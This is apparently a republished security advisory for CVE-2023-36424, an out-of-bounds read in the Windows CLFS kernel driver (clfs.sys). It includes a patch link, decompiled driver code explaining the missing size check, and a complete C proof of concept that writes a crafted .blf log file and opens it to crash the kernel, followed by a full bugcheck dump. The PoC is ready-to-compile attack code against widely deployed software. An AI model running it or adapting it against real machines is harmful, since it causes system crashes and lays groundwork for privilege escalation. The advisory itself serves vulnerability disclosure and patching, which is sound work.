SSD Advisory – Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation
Summary
A vulnerability exists in processing IRP_MJ_CREATE
requests in driver clfs.sys
. This occurs during the processing of blf
files that are parsed in kernel.
Credit
An independent security researcher working with SSD Secure Disclosure.
CVE
CVE-2023-36424
Affected Versions
Windows systems running 64-bit clfs.sys with version 10.0.22621.1555
Vendor Response
The vendor has released a patch for this vulnerability, available at: https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36424
Technical Analysis
During processing truncate metadata block in CClfsLogFcbPhysical::RecoverTruncateLog driver perform checks, that all substructure fits inside metadata block:
dTruncateMetadataBlockPayloadSize = 1; pTruncateMetadataBlock = 0i64; dStatus = CClfsBaseFilePersisted::AcquireTruncateContext( this->pBaseFilePersisted, &dTruncateMetadataBlockPayloadSize, &pTruncateContext, &pTruncate, &dTruncatePayloadSize);
NTSTATUS __fastcall CClfsBaseFilePersisted::AcquireTruncateContext( CClfsBaseFilePersisted *this, unsigned int *i_pdMinimumTruncateMetadataBlockPayloadSize, CLFS_TRUNCATE_CONTEXT **o_pTruncateContext, CLFS_TRUNCATE_RECORD **o_pTruncatePayload, unsigned int *o_dTruncatePayloadSize) { char flAcquiredTruncateMetadataBlock; // si BOOLEAN v10; // r13 NTSTATUS dStatus; // ebx CLFS_LOG_BLOCK_HEADER *pData; // r10 CLFS_CONTROL_RECORD *pRecord; // rcx NTSTATUS dStatus_1; // [rsp+24h] [rbp-34h] CLFS_CONTROL_RECORD *pControlRecord; // [rsp+28h] [rbp-30h] BYREF pControlRecord = 0i64; flAcquiredTruncateMetadataBlock = 0; *o_pTruncateContext = 0i64; v10 = ExAcquireResourceExclusiveLite(this->sBase.pImageResource, 1u); dStatus = CClfsBaseFile::GetControlRecord(&this->sBase, &pControlRecord); dStatus_1 = dStatus; if ( dStatus >= 0 ) { dStatus = CClfsBaseFile::AcquireMetadataBlock(this, TRUNCATE); dStatus_1 = dStatus; if ( dStatus >= 0 ) { flAcquiredTruncateMetadataBlock = 1; pData = this->sBase.pMetaBlockArray[TRUNCATE].pData; if ( pData ) { dStatus = RtlULongSub(pData->dBackupOffset, pData->dPayloadOffset, o_dTruncatePayloadSize); dStatus_1 = dStatus; if ( dStatus < 0 ) goto LABEL_10; if ( *o_dTruncatePayloadSize >= *i_pdMinimumTruncateMetadataBlockPayloadSize ) ...
The requirement is that the payload size of truncate should be greater or equal to i_pdMinimumTruncateMetadataBlockPayloadSize, which defined during call as 1.
But further driver dereference fields at offsets 0x8 and 0xc inside truncate:
bool __fastcall CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid( __int64 a1, CLFS_TRUNCATE_RECORD *i_pTruncate, unsigned int i_dTruncatePayloadSize) { unsigned int dOffsetToOwnerPage; // ecx unsigned int dOffsetToClientChange; // edx bool v5; // cc dOffsetToOwnerPage = i_pTruncate->dOffsetToOwnerPage; if ( dOffsetToOwnerPage < 0x10 ) return 0; dOffsetToClientChange = i_pTruncate->dOffsetToClientChange; if ( dOffsetToClientChange < 0x10 ...
00000000 CLFS_TRUNCATE struc 00000000 field_0 dq ? 00000008 dOffsetToClientChange dd ? 0000000C dOffsetToOwnerPage dd ? 00000010 field_10 dq ? 00000018 field_18 dq ? 00000020 field_20 dd ? 00000024 field_24 dd ? 00000028 CLFS_TRUNCATE_RECORD ends
As a result OOB read occurs.
To reproduce the crash it can be useful to use following command (enable special pool for driver):
verifier /flags 0x1 /driver clfs.sys
Proof of Concept
#include <Windows.h> #include <winternl.h> #include <stdio.h> UINT32 CRC32Reflect(UINT32 a, UINT8 b) { UINT32 result = 0; UINT8 j = 1; for (UINT32 i = a; j <= b; ++j) { if (i & 1) result |= 1 << (b - j); i >>= 1; } return result; } UINT32 CRC32Compute(UINT8* buffer, size_t buflen) { UINT32 polynomial = 0x4C11DB7; UINT32 crcTable[0x100] = { 0 }; for (int i = 0; i < 0x100; ++i) { UINT32 tmp1 = CRC32Reflect(i, 8); INT32 tmp2 = tmp1 << 24; for (int j = 8; j > 0; --j) { tmp2 = 2 * tmp2 ^ ((tmp2 >> 31) & 0x4C11DB7); } crcTable[i] = CRC32Reflect(tmp2, 0x20); } UINT32 result = 0xffffffff; for (size_t i = 0; i < buflen; ++i) { result = (result >> 8) ^ crcTable[(UINT8)result ^ buffer[i]]; } return ~result; } UINT32 ClfsEncodeBlockPrivate(UINT8* block, UINT32 sectorSize, UINT32 a3, UINT32 a4) { if (!*(UINT16*)(block + 4) || *(UINT16*)(block + 6) < *(UINT16*)(block + 4) || *(UINT16*)(block + 4) << 9 > sectorSize) return 0xC01A000A; if (a4 > 0x10) return 0xC000000D; if (!(a3 & 0x10111)) return 0xC000000D; if ((*(UINT32*)(block + 0x10) & 1)) return 0xC01A000A; UINT32 backupOffset = *(UINT32*)(block + 0x68); UINT16* backup = (UINT16*)(block + backupOffset); UINT32 sectorCount = sectorSize >> 9; if ((backupOffset & 7) || ((backupOffset + 2 * sectorCount) > sectorSize)) return 0xC01A000A; for (UINT32 i = 0; i < sectorCount; ++i) { UINT8 flag = a4 | ((i) ? 0x0 : 0x40) | ((sectorCount - 1 != i) ? 0x0 : 0x20); UINT16 checksum = ((a3 << 8) & 0xff00) | (flag & 0xff); backup[i] = *(UINT16*)(block + 0x1fe + (i << 9)); *(UINT16*)(block + 0x1fe + (i << 9)) = checksum; } *(UINT32*)(block + 0x10) = (*(UINT32*)(block + 0x10) & 0xFFFFFFFD) | 1; return 0; } void ClfsEncodeBlock(UINT8* block) { ClfsEncodeBlockPrivate(block, *(UINT16*)(block + 4) << 9, *(UINT8*)(block + 2), 0x10); *(UINT32*)(block + 0xc) = CRC32Compute(block, *(UINT16*)(block + 4) << 9); } char* generateBLF() { char curPathA[MAX_PATH] = { 0 }; GetCurrentDirectoryA(MAX_PATH, curPathA); wchar_t curPathW[MAX_PATH] = { 0 }; GetCurrentDirectoryW(MAX_PATH, curPathW); char* CLFSPath = new char[MAX_PATH]; memset(CLFSPath, 0, MAX_PATH * sizeof(char)); strcat_s(CLFSPath, MAX_PATH, curPathA); strcat_s(CLFSPath, MAX_PATH, "\\ssd_01"); char* BLFPath = new char[MAX_PATH]; memset(BLFPath, 0, MAX_PATH * sizeof(char)); strcat_s(BLFPath, MAX_PATH, CLFSPath); strcat_s(BLFPath, MAX_PATH, ".blf"); wchar_t* containerPath = new wchar_t[MAX_PATH]; memset(containerPath, 0, MAX_PATH * sizeof(wchar_t)); wchar_t* containerPathTmp = new wchar_t[MAX_PATH]; memset(containerPathTmp, 0, MAX_PATH * sizeof(wchar_t)); wcscat_s(containerPath, MAX_PATH, L"\\??\\"); wcscat_s(containerPath, MAX_PATH, curPathW); wcscat_s(containerPath, MAX_PATH, L"\\ssd_01"); wcscat_s(containerPathTmp, MAX_PATH, curPathW); wcscat_s(containerPathTmp, MAX_PATH, L"\\ssd_01"); size_t filesize = 0x400 + 0x400 + 0x2000 + 0x2000 + 0x2000 + 0x2000; UINT8* filebuf = new UINT8[filesize]; memset(filebuf, 0, filesize); *(UINT16*)(filebuf + 0x0 + 0x0) = 0x15; *(UINT16*)(filebuf + 0x0 + 0x2) = 0x1; *(UINT16*)(filebuf + 0x0 + 0x4) = 0x400 >> 9; *(UINT16*)(filebuf + 0x0 + 0x6) = 0x400 >> 9; *(UINT16*)(filebuf + 0x0 + 0x28) = 0x70; *(UINT16*)(filebuf + 0x0 + 0x68) = (0x400 - 2 * (0x400 >> 9)) & (~7); *(UINT64*)(filebuf + 0x0 + 0x70 + 8) = 0xC1F5C1F500005F1C; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x28 + 0x0) = 0x3; *(UINT64*)(filebuf + 0x0 + 0x70 + 0x28 + 0x8) = 0x0; *(UINT64*)(filebuf + 0x0 + 0x70 + 0x28 + 0x10) = 0x10000; *(UINT64*)(filebuf + 0x0 + 0x70 + 0x48) = 0x6; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 8) = 0x400; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x20) = 0x400; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x24) = 0x400; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x28) = 0x1; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x38) = 0x2000; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x3c) = 0x800; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x40) = 0x2; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x50) = 0x2000; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x54) = 0x2800; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x58) = 0x3; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x68) = 0x200; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x6c) = 0x4800; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x70) = 0x4; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x80) = 0x200; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x84) = 0x4a00; *(UINT32*)(filebuf + 0x0 + 0x70 + 0x50 + 0x88) = 0x5; // BASELOG record *(UINT16*)(filebuf + 0x800 + 0x0) = 0x15; *(UINT16*)(filebuf + 0x800 + 0x2) = 0x1; *(UINT16*)(filebuf + 0x800 + 0x4) = 0x2000 >> 9; *(UINT16*)(filebuf + 0x800 + 0x6) = 0x2000 >> 9; *(UINT16*)(filebuf + 0x800 + 0x28) = 0x70; *(UINT16*)(filebuf + 0x800 + 0x68) = (0x2000 - 2 * (0x2000 >> 9)) & (~7); // sHashTable1Entries *(UINT32*)(filebuf + 0x800 + 0x70 + 0x18) = 0x1338; // sHashTable2Entries *(UINT32*)(filebuf + 0x800 + 0x70 + 0x70) = 0x14f0; // dContainersCount *(UINT32*)(filebuf + 0x800 + 0x70 + 0x12c) = 0x1; // sClientSymbolOffsetsArray *(UINT32*)(filebuf + 0x800 + 0x70 + 0x138) = 0x1368; // sContainerSymbolOffsetsArray *(UINT32*)(filebuf + 0x800 + 0x70 + 0x32c) = 0x1520; // dLastAvailableSymOffset *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1328) = 0x800; // dContainerCount *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1334) = 0x1; // CLFS_CLIENT_CONTEXT *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x0) = 0xC1FDF006; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x4) = 0x30; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x8) = 0x0; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0xc) = 0xb8; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x20) = 0x13f0; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x24) = 0x1368; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x0) = 0xC1FDF007; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x4) = 0x88; *(UINT64*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x8) = 0x100000000; *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x10) = 0x1; *(UINT8*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x11) = 0x0; *(UINT16*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x12) = 0x0; *(UINT16*)(filebuf + 0x800 + 0x70 + 0x1338 + 0x30 + 0x24) = 0x1; *(UINT16*)(filebuf + 0x800 + 0x70 + 0x13f0) = 0x0; // CLFS_CONTAINER_CONTEXT *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x0) = 0xC1FDF006; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x4) = 0x30; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x8) = 0x0; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0xc) = 0xb8; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x20) = 0x1550; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x24) = 0x1520; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x0) = 0xC1FDF008; *(UINT32*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x4) = 0x30; *(UINT64*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x8) = 0x80000; *(UINT8*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x10) = 0x1; *(UINT8*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x11) = 0x0; *(UINT16*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x12) = 0x0; *(UINT16*)(filebuf + 0x800 + 0x70 + 0x14f0 + 0x30 + 0x24) = 0x1; wcscpy_s((wchar_t*)(filebuf + 0x800 + 0x70 + 0x1550), MAX_PATH, containerPath); *(UINT16*)(filebuf + 0x4800 + 0x0) = 0x15; *(UINT16*)(filebuf + 0x4800 + 0x2) = 0x1; *(UINT16*)(filebuf + 0x4800 + 0x4) = 0x200 >> 9; *(UINT16*)(filebuf + 0x4800 + 0x6) = 0x200 >> 9; *(UINT16*)(filebuf + 0x4800 + 0x28) = 0x1f7; *(UINT32*)(filebuf + 0x4800 + 0x68) = (0x200 - 2 * (0x200 >> 9)) & (~7); ClfsEncodeBlock(filebuf + 0x0); ClfsEncodeBlock(filebuf + 0x800); ClfsEncodeBlock(filebuf + 0x4800); DeleteFileA(BLFPath); DeleteFileW(containerPathTmp); HANDLE hBLFFile = CreateFileA(BLFPath, GENERIC_ALL, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, 0); if (hBLFFile == INVALID_HANDLE_VALUE) { printf("CreateFileW failed: %x\n", GetLastError()); return NULL; } DWORD written = 0; if (!WriteFile(hBLFFile, filebuf, filesize, &written, NULL)) { printf("WriteFile failed: %x\n", GetLastError()); return NULL; } CloseHandle(hBLFFile); return CLFSPath; } bool triggerCLFS() { char* newfilepath = generateBLF(); if (!newfilepath) { printf("failed generateBLF"); return -1; } char fullfilepath[MAX_PATH] = { 0 }; strcat_s(fullfilepath, "\\\\.\\LOG:\\??\\"); strcat_s(fullfilepath, newfilepath); HANDLE hFile = CreateFileA(fullfilepath, GENERIC_READ, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); CloseHandle(hFile); return true; } int main(int argc, char* argv[]) { if (!triggerCLFS()) { printf("failed triggerCLFS"); return -1; } return 0; }
Crash dump
******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: ffffc8050a59b003, memory referenced. Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. Arg3: fffff8072f73111c, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) Debugging Details: ------------------ KEY_VALUES_STRING: 1 Key : AV.Type Value: Read Key : Analysis.CPU.mSec Value: 2311 Key : Analysis.DebugAnalysisManager Value: Create Key : Analysis.Elapsed.mSec Value: 28648 Key : Analysis.Init.CPU.mSec Value: 5936 Key : Analysis.Init.Elapsed.mSec Value: 2337520 Key : Analysis.Memory.CommitPeak.Mb Value: 112 Key : WER.OS.Branch Value: ni_release Key : WER.OS.Timestamp Value: 2022-05-06T12:50:00Z Key : WER.OS.Version Value: 10.0.22621.1 BUGCHECK_CODE: 50 BUGCHECK_P1: ffffc8050a59b003 BUGCHECK_P2: 0 BUGCHECK_P3: fffff8072f73111c BUGCHECK_P4: 0 READ_ADDRESS: ffffc8050a59b003 Special pool MM_INTERNAL_CODE: 0 IMAGE_NAME: CLFS.SYS MODULE_NAME: CLFS FAULTING_MODULE: fffff8072f720000 CLFS PROCESS_NAME: ssd_01.exe TRAP_FRAME: ffffb08615db7f00 -- (.trap 0xffffb08615db7f00) NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=00000000000001ff rbx=0000000000000000 rcx=0000000000000200 rdx=ffffc8050a59aff7 rsi=0000000000000000 rdi=0000000000000000 rip=fffff8072f73111c rsp=ffffb08615db8098 rbp=ffffb08615db8750 r8=0000000000000001 r9=0000000000000001 r10=ffffc8050a59ae00 r11=ffffb30440fea000 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid: fffff807`2f73111c 8b4a0c mov ecx,dword ptr [rdx+0Ch] ds:ffffc805`0a59b003=???????? Resetting default scope STACK_TEXT: ffffb086`15db74c8 fffff807`2e972062 : ffffb086`15db7630 fffff807`2e73a510 ffffdd00`55de0180 ffffc805`0a59b001 : nt!DbgBreakPointWithStatus ffffb086`15db74d0 fffff807`2e971753 : ffffdd00`00000003 ffffb086`15db7630 fffff807`2e85c680 ffffb086`15db7be0 : nt!KiBugCheckDebugBreak+0x12 ffffb086`15db7530 fffff807`2e8434a7 : 00000000`00000000 00000000`00000000 00000000`00000000 ffffc805`0a59b003 : nt!KeBugCheck2+0xba3 ffffb086`15db7ca0 fffff807`2e8befe9 : 00000000`00000050 ffffc805`0a59b003 00000000`00000000 ffffb086`15db7f00 : nt!KeBugCheckEx+0x107 ffffb086`15db7ce0 fffff807`2e7054dc : ffffb304`3c061150 00000000`00000000 ffffb086`15db7e99 00000000`00000000 : nt!MiSystemFault+0x1bca29 ffffb086`15db7de0 fffff807`2e853f29 : 00000000`00004a00 ffffc805`0a59ce00 ffffb304`40fe8164 00000000`00000000 : nt!MmAccessFault+0x29c ffffb086`15db7f00 fffff807`2f73111c : fffff807`2f7495e8 ffffb304`40fea000 00000000`00000000 ffffb304`40f8bee0 : nt!KiPageFault+0x369 ffffb086`15db8098 fffff807`2f7495e8 : ffffb304`40fea000 00000000`00000000 ffffb304`40f8bee0 ffffb304`40fe8480 : CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid ffffb086`15db80a0 fffff807`2f722d16 : ffffb304`40fe8000 ffffb304`40f8bee0 00000000`00000001 ffffc805`0a596c98 : CLFS!CClfsLogFcbPhysical::RecoverTruncateLog+0x9c ffffb086`15db8100 fffff807`2f755ade : ffffb304`40fe8000 00000000`00000001 ffffb304`3f704ac0 ffffb304`00120089 : CLFS!CClfsLogFcbPhysical::Initialize+0x94a ffffb086`15db8220 fffff807`2f754bdb : ffffb304`3f0fe1a0 ffffccf8`51200001 00000000`00000000 fffff807`2f750000 : CLFS!CClfsRequest::Create+0x67a ffffb086`15db8370 fffff807`2f75416e : ffffb304`3f0fe1a0 ffffb304`3c211d50 ffffb304`3c5fd640 00000000`00000001 : CLFS!CClfsRequest::Dispatch+0x7f ffffb086`15db83c0 fffff807`2f7540b7 : ffffb304`3c5fd640 ffffb304`3c5fd640 ffffb304`3c5fd640 00000000`00000040 : CLFS!ClfsDispatchIoRequest+0x8e ffffb086`15db8410 fffff807`2e656275 : 00000000`00000000 fffff807`2e65e303 00000000`00000000 ffffb304`3c211d50 : CLFS!CClfsDriver::LogIoDispatch+0x27 ffffb086`15db8440 fffff807`2eac1ae9 : 00000000`00000000 ffffb086`15db8750 ffffb304`3c5fd640 ffffb304`40f8b580 : nt!IofCallDriver+0x55 ffffb086`15db8480 fffff807`2eabd217 : fffff807`2eac1220 fffff807`2eac1220 00000000`00000001 ffffb304`3c0f6900 : nt!IopParseDevice+0x8c9 ffffb086`15db8650 fffff807`2eabc642 : ffffc805`09c1adf0 ffffb086`15db8880 00000000`00000040 ffffb304`3c0f6e80 : nt!ObpLookupObjectName+0x697 ffffb086`15db87f0 fffff807`2ead1e29 : 00000000`00000000 ffffb304`3f2ebaa0 00000048`03bdf420 00000000`00000001 : nt!ObOpenObjectByNameEx+0x1f2 ffffb086`15db8920 fffff807`2ead19d9 : 00000048`03bdf3c0 00000000`00000000 00000048`03bdf420 00000048`03bdf3c8 : nt!IopCreateFile+0x439 ffffb086`15db89e0 fffff807`2e8580e8 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtCreateFile+0x79 ffffb086`15db8a70 00007ff9`924ef6f4 : 00007ff9`8fcdaa60 00000000`00000080 00000000`00000000 00000000`642f0000 : nt!KiSystemServiceCopyEnd+0x28 00000048`03bdf338 00007ff9`8fcdaa60 : 00000000`00000080 00000000`00000000 00000000`642f0000 00000000`00000000 : ntdll!NtCreateFile+0x14 00000048`03bdf340 00007ff9`8fcda2d8 : 00000048`03bdf500 00007ff9`0000003e 00000177`d5370001 00000000`00000000 : KERNELBASE!CreateFileInternal+0x590 00000048`03bdf4b0 00007ff6`662e2bc8 : 00000000`00000000 00000048`03bdf6b4 00000000`00000000 00000048`03bdf580 : KERNELBASE!CreateFileA+0xe8 00000048`03bdf540 00007ff6`662e2d48 : 00007ff6`662f50a3 00000000`00000016 00000177`00000000 00007ff9`4d2203c8 : ssd_01!triggerCLFS+0xb8 00000048`03bdf7d0 00007ff6`662e37a9 : 0000ea95`00000001 00000177`d5379950 00000000`00000000 00007ff6`662e4eed : ssd_01!main+0x28 00000048`03bdf8d0 00007ff6`662e364e : 00007ff6`662eb000 00007ff6`662eb220 00000000`00000000 00000000`00000000 : ssd_01!invoke_main+0x39 00000048`03bdf920 00007ff6`662e350e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!__scrt_common_main_seh+0x12e 00000048`03bdf990 00007ff6`662e383e : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!__scrt_common_main+0xe 00000048`03bdf9c0 00007ff9`91b2269d : 00000048`03cbd000 00000000`00000000 00000000`00000000 00000000`00000000 : ssd_01!mainCRTStartup+0xe 00000048`03bdf9f0 00007ff9`924aa9f8 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x1d 00000048`03bdfa20 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x28 SYMBOL_NAME: CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid+0 STACK_COMMAND: .cxr; .ecxr ; kb BUCKET_ID_FUNC_OFFSET: 0 FAILURE_BUCKET_ID: AV_VRF_R_(null)_CLFS!CClfsLogFcbPhysical::IsTruncatedRecordOffsetValid OS_VERSION: 10.0.22621.1 BUILDLAB_STR: ni_release OSPLATFORM_TYPE: x64 OSNAME: Windows 10 FAILURE_ID_HASH: {be87c7fe-0f3f-c3b0-3400-56d9576bc7ff} Followup: MachineOwner ---------
The post SSD Advisory – Windows Kernel Pool (clfs.sys) Corruption Privilege Escalation appeared first on SSD Secure Disclosure.
a href=“https://ssd-disclosure.com/ssd-advisory-windows-kernel-pool-clfs-sys-corruption-privilege-escalation/“>Source / Zdroj